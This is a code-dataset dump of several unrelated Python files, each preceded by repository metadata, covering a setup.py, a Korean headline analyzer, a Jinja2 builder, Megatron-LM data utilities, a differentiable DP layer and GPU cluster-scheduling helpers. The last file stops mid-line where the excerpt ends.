unnecessary_packages, "You have these required packages already (no action)": have_packages, "You need these packages (we installed them for you)": needed_packages, "We also pulled the following packages from github": requirements_from_source.keys() } for x, l in report.items(): l = '\t'.join(l).rstrip() if l != [] else None print("\n{x}:\n\t{l}".format(x=x, l=l)) print() # extra whitespace to look good
44.744186
120
0.577183
528081bc1135c81bfd23288211c3cf7d0eb0fd4e
1,002
py
Python
setup.py
choi-jiwoo/pyrich
21f2b2196803ea18d50f904b90a0d7598c183345
[ "MIT" ]
null
null
null
setup.py
choi-jiwoo/pyrich
21f2b2196803ea18d50f904b90a0d7598c183345
[ "MIT" ]
null
null
null
setup.py
choi-jiwoo/pyrich
21f2b2196803ea18d50f904b90a0d7598c183345
[ "MIT" ]
null
null
null
from setuptools import setup from setuptools import find_packages from pyrich import __version__ as VERSION description = 'My own portfolio management service' project_urls = { 'Source': 'https://github.com/choi-jiwoo/pyrich', } with open('README.md', 'r') as f: long_description = f.read() install_requires = [ ] setup( name='pyrich', version=VERSION, author='Choi Ji Woo', author_email='cho2.jiwoo@gmail.com', description=description, long_description=long_description, long_description_content_type='text/markdown', packages=find_packages(), install_requires=install_requires, license='MIT', project_urls=project_urls, classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Education', 'Programming Language :: Python :: 3', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', ], entry_points={'console_scripts': ['pyrich=pyrich.control:run']}, )
27.081081
68
0.683633
4a47c90da60ee9161a7cf362717cad63521c60a4
2,602
py
Python
nt-worker/Analysis/AnalysisTitle.py
KPFBERT/Newstrust
db1ca6454ce9f421f9c4006f8cd00bade06b17b5
[ "MIT" ]
1
2022-02-25T02:35:09.000Z
2022-02-25T02:35:09.000Z
nt-worker/Analysis/AnalysisTitle.py
KPFBERT/Newstrust
db1ca6454ce9f421f9c4006f8cd00bade06b17b5
[ "MIT" ]
null
null
null
nt-worker/Analysis/AnalysisTitle.py
KPFBERT/Newstrust
db1ca6454ce9f421f9c4006f8cd00bade06b17b5
[ "MIT" ]
null
null
null
# from eunjeon import Mecab from konlpy.tag import Mecab class AnalysisTitle(object): def __init__(self, inputTitle): self.TitleText = self.preProcessTitle(inputTitle) #제목 내용 self.TitleMecabTag = self.getMecabTag() #제목 mecab tag self.TitleLen = self.getTitleLen() #제목 길이 self.QuestionMarkCount = self.getQuestionMarkCount() #제목에 물음표 갯수 self.ExclamationMarkCount = self.getExclamationMarkCount() #제목에 느낌표 갯수 self.TitleAdverbsCount = self.getTitleAdverbsNum() #제목에 평균 부사수 self.TitleDoubleQuotationsMarksNum = self.getTitleDoubleQuotationsMarksNum() #제목에 쌍따옴표 갯수 def preProcessTitle(self, title): value = title.replace("\n\n", "\n") value = value.replace('‘', '\'', -1) value = value.replace('’', '\'', -1) value = value.replace('“', '\"', -1) value = value.replace('”', '\"', -1) return value def getMecabTag(self): mecab = Mecab() # mecab = MeCab.Tagger() mecabTag = mecab.pos(self.TitleText) # mecabTag = mecab.parse(self.TitleText) return mecabTag def getTitleLen(self): TitleLen = len(self.TitleText) return TitleLen def getQuestionMarkCount(self): count = 0 for val in self.TitleMecabTag: if 'SF' in val[1]: if '?' == val[0]: count += 1 return count def getExclamationMarkCount(self): count = 0 for val in self.TitleMecabTag: if 'SF' in val[1]: if '!' == val[0]: count += 1 return count def getTitleAdverbsNum(self): count = 0 for val in self.TitleMecabTag: if 'MAG' in val[1] or 'MAJ' in val[1]: count += 1 return count def getTitleDoubleQuotationsMarksNum(self): count = 0 for val in self.TitleMecabTag: if 'SY' in val[1]: if '"' in val[0]: count += 1 return count def PrintMyValue(self): print('----------print Analysis Title----------') print('TitleText : ', self.TitleText) print('TitleMecabTag : ', self.TitleMecabTag) print('TitleLen : ', self.TitleLen) print('QuestionMarkCount : ', self.QuestionMarkCount) print('ExclamationMarkCount : ', self.ExclamationMarkCount) print('TitleAdverbsCount : ', self.TitleAdverbsCount) print('TitleDoubleQuotationsMarksNum : ', self.TitleDoubleQuotationsMarksNum) print('----------End Analysis Title----------')
35.643836
97
0.574942
3b2c87e59df9b6f4ef1a87ea5abf99d3a8fffb94
687
py
Python
eka/classes/builders/jinja.py
viswanc/eka
edb0aa373f74ec297d0e35e9cd6d564264322698
[ "MIT" ]
1
2019-11-03T16:03:59.000Z
2019-11-03T16:03:59.000Z
eka/classes/builders/jinja.py
viswanc/eka
edb0aa373f74ec297d0e35e9cd6d564264322698
[ "MIT" ]
null
null
null
eka/classes/builders/jinja.py
viswanc/eka
edb0aa373f74ec297d0e35e9cd6d564264322698
[ "MIT" ]
null
null
null
r""" A builder based on Jinja2 Templates. """ from laufire.filesys import copyContent, ensureCleanDir, ensureDir, getContent, getPathPairs, getPathType, setContent from jinja2 import Template class jinjaBuilder(object): def __init__(self): pass def render(self, templateText, Data): return Template(templateText).render(Data) def build(self, srcPath, tgtPath, Data): ensureCleanDir(tgtPath) for src, tgt in getPathPairs(srcPath, tgtPath): if getPathType(src) != 1: ensureDir(tgt) elif tgt[-6:] != '.jinja': copyContent(src, tgt) else: setContent(tgt[:-6], Template(getContent(src)).render(Data)) return tgtPath
23.689655
117
0.687045
ce63046aa520b39ed884ea82211df4f45f55fff2
7,563
py
Python
megatron/data/biencoder_dataset_utils.py
sourcery-ai-bot/Megatron-LM
f27f44e2c49d1cb39b2288bef6f7d837e11094cb
[ "MIT" ]
null
null
null
megatron/data/biencoder_dataset_utils.py
sourcery-ai-bot/Megatron-LM
f27f44e2c49d1cb39b2288bef6f7d837e11094cb
[ "MIT" ]
null
null
null
megatron/data/biencoder_dataset_utils.py
sourcery-ai-bot/Megatron-LM
f27f44e2c49d1cb39b2288bef6f7d837e11094cb
[ "MIT" ]
null
null
null
import os import time import numpy as np import torch from megatron import get_args, get_tokenizer, mpu, print_rank_0 from megatron.data.dataset_utils import create_masked_lm_predictions, \ pad_and_convert_to_numpy from megatron.data.data_samplers import MegatronPretrainingSampler def make_attention_mask(source_block, target_block): """ Returns a 2-dimensional (2-D) attention mask :param source_block: 1-D array :param target_block: 1-D array """ mask = (target_block[None, :] >= 1) * (source_block[:, None] >= 1) mask = mask.astype(np.int64) # (source_length, target_length) return mask def get_one_epoch_dataloader(dataset, micro_batch_size=None): """Specifically one epoch to be used in an indexing job.""" args = get_args() if micro_batch_size is None: micro_batch_size = args.micro_batch_size num_workers = args.num_workers # Use megatron's sampler with consumed samples set to 0 as # this is only for evaluation and don't intend to resume half way. # Also, set the drop last to false as don't intend to remove # the last batch batch_sampler = MegatronPretrainingSampler( total_samples=len(dataset), consumed_samples=0, micro_batch_size=args.micro_batch_size, data_parallel_rank=mpu.get_data_parallel_rank(), data_parallel_size=mpu.get_data_parallel_world_size(), drop_last=False) return torch.utils.data.DataLoader(dataset, batch_sampler=batch_sampler, num_workers=num_workers, pin_memory=True) def get_ict_batch(data_iterator): # Items and their type. keys = ['query_tokens', 'query_mask', 'context_tokens', 'context_mask', 'block_data'] datatype = torch.int64 # Broadcast data. data = None if data_iterator is None else next(data_iterator) data_b = mpu.broadcast_data(keys, data, datatype) # Unpack. query_tokens = data_b['query_tokens'].long() query_mask = data_b['query_mask'] < 0.5 context_tokens = data_b['context_tokens'].long() context_mask = data_b['context_mask'] < 0.5 block_indices = data_b['block_data'].long() return query_tokens, query_mask,\ context_tokens, context_mask, block_indices def join_str_list(str_list): """Join a list of strings, handling spaces appropriately""" return "".join(s[2:] if s.startswith("##") else " " + s for s in str_list) class BlockSampleData(object): """A struct for fully describing a fixed-size block of data as used in REALM :param start_idx: for first sentence of the block :param end_idx: for last sentence of the block (may be partially truncated in sample construction) :param doc_idx: the index of the document from which the block comes in the original indexed dataset :param block_idx: a unique integer identifier given to every block. """ def __init__(self, start_idx, end_idx, doc_idx, block_idx): self.start_idx = start_idx self.end_idx = end_idx self.doc_idx = doc_idx self.block_idx = block_idx def as_array(self): return np.array([self.start_idx, self.end_idx, self.doc_idx, self.block_idx]).astype(np.int64) def as_tuple(self): return self.start_idx, self.end_idx, self.doc_idx, self.block_idx class BlockSamplesMapping(object): def __init__(self, mapping_array): # make sure that the array is compatible with BlockSampleData assert mapping_array.shape[1] == 4 self.mapping_array = mapping_array def __len__(self): return self.mapping_array.shape[0] def __getitem__(self, idx): """Get the data associated with an indexed sample.""" return BlockSampleData(*self.mapping_array[idx]) def get_block_samples_mapping(block_dataset, title_dataset, data_prefix, num_epochs, max_num_samples, max_seq_length, seed, name, use_one_sent_docs=False): """Get samples mapping for a dataset over fixed size blocks. This function also requires a dataset of the titles for the source documents since their lengths must be taken into account. :return: samples_mapping (BlockSamplesMapping) """ if not num_epochs: if not max_num_samples: raise ValueError("Need to specify either max_num_samples " "or num_epochs") num_epochs = np.iinfo(np.int32).max - 1 if not max_num_samples: max_num_samples = np.iinfo(np.int64).max - 1 # Filename of the index mapping indexmap_filename = data_prefix indexmap_filename += '_{}_indexmap'.format(name) if num_epochs != (np.iinfo(np.int32).max - 1): indexmap_filename += '_{}ep'.format(num_epochs) if max_num_samples != (np.iinfo(np.int64).max - 1): indexmap_filename += '_{}mns'.format(max_num_samples) indexmap_filename += '_{}msl'.format(max_seq_length) indexmap_filename += '_{}s'.format(seed) if use_one_sent_docs: indexmap_filename += '_1sentok' indexmap_filename += '.npy' # Build the indexed mapping if not exist. if mpu.get_data_parallel_rank() == 0 and \ not os.path.isfile(indexmap_filename): print(' > WARNING: could not find index map file {}, building ' 'the indices on rank 0 ...'.format(indexmap_filename)) # Make sure the types match the helpers input types. assert block_dataset.doc_idx.dtype == np.int64 assert block_dataset.sizes.dtype == np.int32 # Build samples mapping verbose = torch.distributed.get_rank() == 0 start_time = time.time() print_rank_0(' > building samples index mapping for {} ...'.format( name)) from megatron.data import helpers mapping_array = helpers.build_blocks_mapping( block_dataset.doc_idx, block_dataset.sizes, title_dataset.sizes, num_epochs, max_num_samples, max_seq_length - 3, # account for added tokens seed, verbose, use_one_sent_docs) print_rank_0(' > done building samples index mapping') np.save(indexmap_filename, mapping_array, allow_pickle=True) print_rank_0(' > saved the index mapping in {}'.format( indexmap_filename)) # Make sure all the ranks have built the mapping print_rank_0(' > elapsed time to build and save samples mapping ' '(seconds): {:4f}'.format( time.time() - start_time)) # This should be a barrier but nccl barrier assumes # device_index=rank which is not the case for model # parallel case counts = torch.cuda.LongTensor([1]) torch.distributed.all_reduce(counts, group=mpu.get_data_parallel_group()) assert counts[0].item() == torch.distributed.get_world_size( group=mpu.get_data_parallel_group()) # Load indexed dataset. print_rank_0(' > loading indexed mapping from {}'.format( indexmap_filename)) start_time = time.time() mapping_array = np.load(indexmap_filename, allow_pickle=True, mmap_mode='r') samples_mapping = BlockSamplesMapping(mapping_array) print_rank_0(' loaded indexed file in {:3.3f} seconds'.format( time.time() - start_time)) print_rank_0(' total number of samples: {}'.format( mapping_array.shape[0])) return samples_mapping
38.005025
104
0.665609
fbcfd0fd3b36832c775e1e2833a173c422c32911
1,701
py
Python
server/src/services/dataCleaner.py
JRHutson/311-data
4af3899d29a00cc090cf4c04a57863096b30bf7a
[ "MIT" ]
null
null
null
server/src/services/dataCleaner.py
JRHutson/311-data
4af3899d29a00cc090cf4c04a57863096b30bf7a
[ "MIT" ]
null
null
null
server/src/services/dataCleaner.py
JRHutson/311-data
4af3899d29a00cc090cf4c04a57863096b30bf7a
[ "MIT" ]
null
null
null
import sqlalchemy as db import pandas as pd from sqlIngest import DataHandler import databaseOrm class DataCleaner(DataHandler): def __init__(self, config=None, configFilePath=None, separator=','): self.data = None self.config = config self.dbString = None if not self.config \ else self.config['Database']['DB_CONNECTION_STRING'] self.filePath = None self.configFilePath = configFilePath self.separator = separator self.fields = databaseOrm.tableFields self.insertParams = databaseOrm.insertFields self.readParams = databaseOrm.readFields def fetchData(self): '''Retrieve data from mySql database instance''' engine = db.create_engine(self.dbString) self.data = pd.read_sql('ingest_staging_table', con=engine, index_col='srnumber') def formatData(self): '''Perform changes to data formatting to ensure compatibility with cleaning and frontend processes''' pass def groupData(self): '''Cluster data by geographic area to remove repeat instances of 311 reports''' pass def cleaningReport(self): '''Write out cleaning report summarizing operations performed on data as well as data characteristics''' pass if __name__ == "__main__": '''Class DataHandler workflow from initial load to SQL population''' cleaner = DataCleaner() cleaner.loadConfig(configFilePath='../settings.cfg') cleaner.fetchData() # can use inherited ingestData method to write to table cleaner.ingestData(tableName='clean_data')
34.02
72
0.654909
51aa25a8c207a49d5c938409a7a711d479839ef7
143
py
Python
data_loader.py
bboltt/Bisect-K-Means
41776f2abf55be77e14e8017c1271f3f3d434fc2
[ "MIT" ]
null
null
null
data_loader.py
bboltt/Bisect-K-Means
41776f2abf55be77e14e8017c1271f3f3d434fc2
[ "MIT" ]
null
null
null
data_loader.py
bboltt/Bisect-K-Means
41776f2abf55be77e14e8017c1271f3f3d434fc2
[ "MIT" ]
null
null
null
import numpy as np """ load data as numpy array """ def get_dat_sets(file_path): samples = np.genfromtxt(file_path) return samples
11.916667
38
0.699301
e6aa609984136ea546ffcf98e08f120fb5723920
619
py
Python
python/vechist/plot_vec.py
xintong-osu/VecHist
83ed3533bd140848431908699adc1f0134463ea1
[ "MIT" ]
2
2019-11-02T12:35:33.000Z
2020-04-04T13:30:40.000Z
python/vechist/plot_vec.py
xintong-osu/VecHist
83ed3533bd140848431908699adc1f0134463ea1
[ "MIT" ]
null
null
null
python/vechist/plot_vec.py
xintong-osu/VecHist
83ed3533bd140848431908699adc1f0134463ea1
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Thu Feb 19 01:04:40 2015 @author: tong """ def plot(d, stride): import numpy as np from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt fig = plt.figure() ax = fig.gca(projection='3d') ax.set_aspect('equal') d = d[::stride,::stride,::stride,:] y, z, x = np.meshgrid(np.arange(0, d.shape[1]), np.arange(0, d.shape[0]), np.arange(0, d.shape[2])) # print(d[:,:,:,0].shape) # print(x.shape) # print(y.shape) # print(z.shape) ax.quiver(x, y, z, d[:,:,:,0], d[:,:,:,1], d[:,:,:,2]) plt.show()
22.925926
103
0.544426
1566627a759f95d60bd9acdaa930ed7eb4e23cca
4,772
py
Python
dp_layer/dp_function.py
NYU-DICE-Lab/graph_invnet
166db79ac9ab3bff0e67ab0ec978da7efea042e2
[ "MIT" ]
null
null
null
dp_layer/dp_function.py
NYU-DICE-Lab/graph_invnet
166db79ac9ab3bff0e67ab0ec978da7efea042e2
[ "MIT" ]
4
2021-06-08T23:01:47.000Z
2022-03-12T00:53:53.000Z
dp_layer/dp_function.py
NYU-DICE-Lab/graph_invnet
166db79ac9ab3bff0e67ab0ec978da7efea042e2
[ "MIT" ]
null
null
null
import torch from torch.autograd import Function class DPFunction(Function): def __init__(self): super(DPFunction, self).__init__() @staticmethod def forward(ctx, input, adj_array, rev_adj, max_op,replace): ''' Parameters ---------- input: numpy.ndarray shape nxn Returns ------- v: int Shortest path value computed by soft-DP image_grad: numpy.ndarray Gradient of the loss w.r.t the image pixel values true_shortest_path: int Shortest path value computed by hard-DP ''' if not ctx.needs_input_grad[0]: return DPFunction.hard_forward(input,adj_array,max_op,replace) device=input.device d_type=input.dtype op=DPFunction.s_min hard_op=torch.min if max_op: op=DPFunction.s_max hard_op=torch.max ctx.rev_map=rev_adj thetas = input batch_size,n_nodes,_= thetas.shape assert n_nodes>1 V_hard=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device) V=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device) Q=torch.zeros((batch_size,n_nodes,4),dtype=d_type,device=device) if replace==0: V[:,-1]=replace V_hard[:,-1]=replace else: V[:, -1] += replace V_hard[:, -1] += replace V[:-2] = 0 V_hard[:-2]= 0 for i in reversed(range(n_nodes-1)): theta=thetas[:,i,:] idxs=adj_array[i] for dir,idx in enumerate(idxs): if idx is None: idxs[dir]=n_nodes values=torch.stack([V[:,i] for i in idxs],dim=1) options=values+theta soft=op(options) V[:,i],Q[:,i,:]=soft[0],soft[1] hard_values = torch.stack([V_hard[:, i] for i in idxs], dim=1) hard_options=hard_values+theta V_hard[:,i]=hard_op(hard_options,dim=1)[0] v_hard=V_hard[:,0] ctx.save_for_backward(v_hard,Q) return v_hard @staticmethod def backward(ctx,v_grad): '''v_grad is the gradient of the loss with respect to v_hard''' v_hard,Q = ctx.saved_tensors b,n,_=Q.shape E_hat=torch.zeros((b,n),dtype=Q.dtype,device=Q.device) E = torch.zeros((b,n,4),dtype=Q.dtype,device=Q.device) E[:,0,:]=Q[:,0,:] E_hat[:,0]=1 for i in range(1,n): back_idxs=ctx.rev_map[i] total=torch.zeros((b),dtype=Q.dtype,device=Q.device) for dir_idx,back_idx in enumerate(back_idxs): if back_idx is not None and dir_idx <n: parent=Q[:,back_idx,dir_idx]*E_hat[:,back_idx] #E_hat is total effect of parent node on loss #so parent represents the current node's effect on parent total+=parent E[:,back_idx,dir_idx]=parent E_hat[:,i]=total full_grad=v_grad.view(-1,1,1)*E return full_grad,None,None,None,None @staticmethod def s_max(options): max_x = torch.max(options, dim=1)[0].view(-1, 1) exp_x = torch.exp(options - max_x) Z = torch.sum(exp_x, dim=1).unsqueeze(-1) smooth_max = (torch.log(Z) + max_x).squeeze() probs = exp_x / Z return smooth_max, probs @staticmethod def s_min(options): neg_options = -1 * options s_min_val, s_argmin = DPFunction.s_max(neg_options) s_min_val *= -1 return s_min_val, s_argmin @staticmethod def hard_forward(input, adj_array, max_op,replace): '''Computes v_hard as in forward(), but without any of the additional computation needed to make function differentiable''' device=input.device d_type=input.dtype hard_op=torch.min if max_op: hard_op=torch.max thetas = input batch_size,n_nodes,_= thetas.shape assert n_nodes>1 V_hard=torch.zeros((batch_size,n_nodes+1),dtype=d_type,device=device) if replace==0: V_hard[:,-1]=replace else: V_hard[:, -1] += replace V_hard[:,-2]= 0 for i in reversed(range(n_nodes-1)): theta=thetas[:,i,:] idxs=adj_array[i] for dir,idx in enumerate(idxs): if idx is None: idxs[dir]=n_nodes hard_values = torch.stack([V_hard[:, i] for i in idxs], dim=1) hard_options=hard_values+theta V_hard[:,i]=hard_op(hard_options,dim=1)[0] v_hard=V_hard[:,0] return v_hard
34.330935
77
0.554484
b79ddf75bbba445dd088867b6f5092289037d8f5
22,758
py
Python
cluster_scheduling/scheduler/utils.py
stanford-futuredata/POP
baa041dc67a465b8111e22e215880fa7d4fe8c61
[ "MIT" ]
15
2021-09-24T14:03:52.000Z
2022-03-28T15:44:21.000Z
cluster_scheduling/scheduler/utils.py
stanford-futuredata/POP
baa041dc67a465b8111e22e215880fa7d4fe8c61
[ "MIT" ]
1
2021-12-14T09:05:29.000Z
2021-12-16T11:55:55.000Z
cluster_scheduling/scheduler/utils.py
stanford-futuredata/POP
baa041dc67a465b8111e22e215880fa7d4fe8c61
[ "MIT" ]
2
2022-01-05T12:29:01.000Z
2022-01-15T03:10:11.000Z
import csv from datetime import datetime import json import os import pickle import psutil import random import re import socket import subprocess from job import Job from job_table import JobTable from policies import allox, fifo, finish_time_fairness, gandiva, isolated, \ max_min_fairness, max_min_fairness_water_filling, max_sum_throughput, \ min_total_duration def _generate_scale_factor(rng): # Sample the scale factor from the Philly distribution. scale_factor = 1 r = rng.uniform(0, 1) if 0.7 <= r <= 0.8: scale_factor = 2 elif 0.8 <= r <= 0.95: scale_factor = 4 elif 0.95 <= r: scale_factor = 8 return scale_factor def _generate_duration(rng): # Sample the job duration from the Philly distribution. if rng.random() >= 0.8: run_time = 60 * (10 ** rng.uniform(3, 4)) else: run_time = 60 * (10 ** rng.uniform(1.5, 3)) return run_time def generate_job(throughputs, reference_worker_type='v100', rng=None, job_id=None, fixed_job_duration=None, generate_multi_gpu_jobs=False, generate_multi_priority_jobs=False, run_dir=None, scale_factor_generator_func=_generate_scale_factor, duration_generator_func=_generate_duration, scale_factor_rng=None, duration_rng=None, SLO_rng=None, always_generate_scale_factor=True): """Generates a new job. Args: throughputs: A dict containing pre-measured throughputs. reference_worker_type: The worker type to use when calculating steps. rng: A random number generator for selecting job parameters. job_id: The job's ID. fixed_job_duration: If set, fixes the duration to the specified value. generate_multi_gpu_jobs: If set, generate a scale factor >= 1. generate_multi_priority_jobs: If set, generate a priority >= 1. run_dir: The directory to run the job from. scale_factor_generator_func: A function that accepts an RNG parameter and returns a job size. duration_generator_func: A function that accepts an RNG parameter and returns a job duration in seconds. scale_factor_rng: A random number generator specifically for generating scale factors. duration_rng: A random number generator specifically for generating durations. SLO_rng: If set, generate an SLO >= 1 using this RNG. always_generate_scale_factor: If set, generate a scale factor regardless of whether user has requested multi-GPU jobs. Returns: The generated Job. """ if rng is None: rng = random.Random() if scale_factor_rng is None: scale_factor_rng = rng if duration_rng is None: duration_rng = rng job_template = None if always_generate_scale_factor: scale_factor = scale_factor_generator_func(scale_factor_rng) else: # NOTE: We select the job template here to maintain backwards # compatability with scripts/utils/generate_trace.py job_template = rng.choice(JobTable) if generate_multi_gpu_jobs and job_template.distributed: scale_factor = scale_factor_generator_func(scale_factor_rng) else: scale_factor = 1 if fixed_job_duration: run_time = fixed_job_duration else: run_time = duration_generator_func(duration_rng) if not generate_multi_gpu_jobs: scale_factor = 1 assert(run_time > 0) assert(scale_factor >= 1 and scale_factor <= 8) # Sample the job type. if job_template is None: while True: job_template = rng.choice(JobTable) if (scale_factor == 1 or (scale_factor > 1 and job_template.distributed)): break job_type = job_template.model # Complete the job command with the run directory. command = job_template.command if run_dir is not None: if job_template.needs_data_dir: command = command % (run_dir, run_dir) else: command = command % (run_dir) # Compute the number of steps the job will run for given its duration. key = (job_type, scale_factor) assert(key in throughputs[reference_worker_type]) num_steps = run_time * throughputs[reference_worker_type][key]['null'] assert(num_steps > 0) # Optionally assign a priority to the job. priority_weight = 1.0 if generate_multi_priority_jobs: r = rng.uniform(0, 1) if 0.0 <= r <= 0.2: priority_weight = 5.0 # Optionally assign an SLO to the job. SLO = None if SLO_rng is not None: r = SLO_rng.uniform(0, 1) if 0.0 <= r < 0.33: SLO = 1.2 elif 0.33 <= r < 0.67: SLO = 2.0 else: SLO = 10.0 job = Job(job_id=job_id, job_type=job_type, command=command, working_directory=job_template.working_directory, num_steps_arg=job_template.num_steps_arg, total_steps=num_steps, duration=run_time, scale_factor=scale_factor, priority_weight=priority_weight, SLO=SLO, needs_data_dir=job_template.needs_data_dir) return job def load_philly_job_distribution(): with open('philly_job_distribution.pickle', 'rb') as f: return pickle.load(f) def get_ip_address(): hostname = socket.gethostname() ip_address = socket.gethostbyname(hostname) return ip_address def get_num_gpus(): command = 'nvidia-smi -L' output = subprocess.run(command, stdout=subprocess.PIPE, check=True, shell=True).stdout.decode('utf-8').strip() return len(output.split('\n')) def get_pid_for_job(command): pids = [] for proc in psutil.process_iter(): cmdline = ' '.join(proc.cmdline()) if cmdline == command: pids.append(proc.pid) return min(pids) def get_gpu_processes(): output = subprocess.check_output('nvidia-smi').decode('utf-8') gpu_processes = {} processes_flag = False for line in output.split('\n'): if 'Processes' in line: processes_flag = True continue if processes_flag: res = re.search('(\d+) +(\d+) +(\w+) +(.+) +(\d+)MiB', line) if res is not None: gpu_id = int(res.group(1)) if gpu_id not in gpu_processes: gpu_processes[gpu_id] = [] pid = int(res.group(2)) process_name = res.group(4) if process_name != 'nvidia-cuda-mps-server': gpu_processes[gpu_id].append(pid) return gpu_processes def get_available_policies(): return ['allox', 'fifo', 'fifo_perf', 'fifo_packed', 'finish_time_fairness', 'finish_time_fairness_perf', 'finish_time_fairness_packed', 'gandiva', 'isolated', 'max_min_fairness', 'max_min_fairness_perf', 'max_min_fairness_packed', 'max_min_fairness_water_filling', 'max_min_fairness_water_filling_perf', 'max_min_fairness_water_filling_packed', 'max_sum_throughput_perf', 'max_sum_throughput_normalized_by_cost_perf', 'max_sum_throughput_normalized_by_cost_perf_SLOs', 'max_sum_throughput_normalized_by_cost_packed_SLOs', 'min_total_duration', 'min_total_duration_perf', 'min_total_duration_packed', ] def read_per_instance_type_spot_prices_aws(directory): # TODO: Make this flexible. directory = os.path.join(directory, 'us-east-1') per_instance_type_spot_prices = {} for filename in os.listdir(directory): full_filepath = os.path.join(directory, filename) with open(full_filepath, 'r') as f: json_obj = json.load(f) for x in json_obj['SpotPriceHistory']: instance_type = x['InstanceType'] if instance_type not in per_instance_type_spot_prices: per_instance_type_spot_prices[instance_type] = [] per_instance_type_spot_prices[instance_type].append(x) return per_instance_type_spot_prices def read_per_instance_type_spot_prices_azure(directory): per_instance_type_spot_prices = {} for filename in os.listdir(directory): full_filepath = os.path.join(directory, filename) with open(full_filepath, 'r') as f: zone = filename.replace(".csv", "") reader = csv.reader(f) i = 0 for row in reader: if i == 0: header = row for header_elem in header[1:]: if header_elem not in per_instance_type_spot_prices: per_instance_type_spot_prices[header_elem] = {} else: for (header_elem, row_elem) in zip(header[1:], row[1:]): if (zone not in per_instance_type_spot_prices[header_elem]): per_instance_type_spot_prices[header_elem][zone] = [] date = datetime.strptime(row[0], '%m/%d/%Y') per_instance_type_spot_prices[header_elem][zone].append((date, row_elem)) i += 1 return per_instance_type_spot_prices def read_per_instance_type_spot_prices_json(directory): per_instance_type_spot_prices = {} per_instance_type_spot_prices['aws'] = \ read_per_instance_type_spot_prices_aws(os.path.join(directory, 'aws/logs')) per_instance_type_spot_prices['azure'] = \ read_per_instance_type_spot_prices_azure(os.path.join(directory, 'azure/logs')) per_instance_type_spot_prices['gcp'] = { 'v100': 0.74, 'p100': 0.43, 'k80': 0.135 } return per_instance_type_spot_prices def get_latest_price_for_worker_type_aws(worker_type, current_time, per_instance_type_spot_prices): # TODO: Make this function more efficient. if worker_type == 'v100': instance_type = 'p3.2xlarge' elif worker_type == 'p100': # NOTE: AWS does not have single P100 instances, use 1.5x K80 price # as a proxy. instance_type = 'p2.xlarge' elif worker_type == 'k80': instance_type = 'p2.xlarge' timestamps = [datetime.strptime(x['Timestamp'], '%Y-%m-%dT%H:%M:%S.000Z') for x in per_instance_type_spot_prices[instance_type]] timestamps.sort() availability_zones = \ [x['AvailabilityZone'] for x in per_instance_type_spot_prices[instance_type]] latest_prices = [] for availability_zone in set(availability_zones): per_instance_type_spot_prices[instance_type].sort( key=lambda x: datetime.strptime(x['Timestamp'], '%Y-%m-%dT%H:%M:%S.000Z')) latest_price = None for x in per_instance_type_spot_prices[instance_type]: if x['AvailabilityZone'] != availability_zone: continue timestamp = (datetime.strptime(x['Timestamp'], '%Y-%m-%dT%H:%M:%S.000Z') - timestamps[0]).total_seconds() if timestamp > current_time and latest_price is not None: break latest_price = float(x['SpotPrice']) assert(latest_price is not None) latest_prices.append(latest_price) # NOTE: AWS does not have single P100 instances, use 1.5x K80 price # as a proxy. if worker_type == 'p100': return min(latest_prices) * 1.5 else: return min(latest_prices) def get_latest_price_for_worker_type_gcp(worker_type, current_time, per_instance_type_spot_prices): return per_instance_type_spot_prices[worker_type] def get_latest_price_for_worker_type_azure(worker_type, current_time, per_instance_type_spot_prices): if worker_type == 'k80': instance_type = 'NC6' elif worker_type == 'p100': instance_type = 'NC6s v2' elif worker_type == 'v100': instance_type = 'NC6s v3' earliest_timestamps = [] for zone in per_instance_type_spot_prices[instance_type]: per_instance_type_spot_prices[instance_type][zone].sort( key=lambda x: x[0]) earliest_timestamps.append( per_instance_type_spot_prices[instance_type][zone][0][0]) earliest_timestamp = min(earliest_timestamps) latest_prices = [] for zone in per_instance_type_spot_prices[instance_type]: latest_price = None for x in per_instance_type_spot_prices[instance_type][zone]: timestamp = (x[0] - earliest_timestamp).total_seconds() if timestamp > current_time and latest_price is not None: break elif x[1] == '': continue else: # Remove '$' character. latest_price = float(x[1][1:]) return latest_price def get_latest_price_for_worker_type(worker_type, current_time, per_instance_type_spot_prices, available_clouds): assert(len(available_clouds) > 0) prices = [] if 'aws' in available_clouds: aws_price = \ get_latest_price_for_worker_type_aws( worker_type, current_time, per_instance_type_spot_prices['aws']) prices.append(aws_price) if 'gcp' in available_clouds: gcp_price = \ get_latest_price_for_worker_type_gcp( worker_type, current_time, per_instance_type_spot_prices['gcp']) prices.append(gcp_price) if 'azure' in available_clouds: azure_price = \ get_latest_price_for_worker_type_azure( worker_type, current_time, per_instance_type_spot_prices['azure']) prices.append(azure_price) return min(prices) def parse_job_type_str(job_type): if job_type is None: return None match = re.match('(.*) \(scale factor (\d+)\)', job_type) if match is None: return (job_type, 1) model = match.group(1) scale_factor = int(match.group(2)) return (model, scale_factor) def parse_job_type_tuple(job_type): match = re.match('\(\'(.*)\', (\d+)\)', job_type) if match is None: return None model = match.group(1) scale_factor = int(match.group(2)) return (model, scale_factor) def stringify_throughputs(throughputs): stringified_throughputs = {} for worker_type in throughputs: stringified_throughputs[worker_type] = {} for key in throughputs[worker_type]: stringified_throughputs[worker_type][str(key)] = {} for other_key in throughputs[worker_type][key]: stringified_throughputs[worker_type][str(key)][str(other_key)] = \ throughputs[worker_type][key][other_key] return stringified_throughputs def read_all_throughputs_json_v2(file_name): with open(file_name, 'r') as f: raw_throughputs = json.load(f) parsed_throughputs = {} for worker_type in raw_throughputs: parsed_throughputs[worker_type] = {} for job_type in raw_throughputs[worker_type]: key = parse_job_type_tuple(job_type) assert(key is not None) parsed_throughputs[worker_type][key] = {} for other_job_type in raw_throughputs[worker_type][job_type]: if other_job_type == 'null': other_key = other_job_type else: other_key = parse_job_type_tuple(other_job_type) assert(other_key is not None) parsed_throughputs[worker_type][key][other_key] =\ raw_throughputs[worker_type][job_type][other_job_type] return parsed_throughputs def read_all_throughputs_json(throughputs_file): with open(throughputs_file, 'r') as f: throughputs = json.load(f) return throughputs def get_policy(policy_name, solver=None, seed=None, priority_reweighting_policies=None, num_threads=None): if policy_name.startswith('allox'): if policy_name == 'allox': alpha = 1.0 else: alpha = float(policy_name.split("allox_alpha=")[1]) policy = 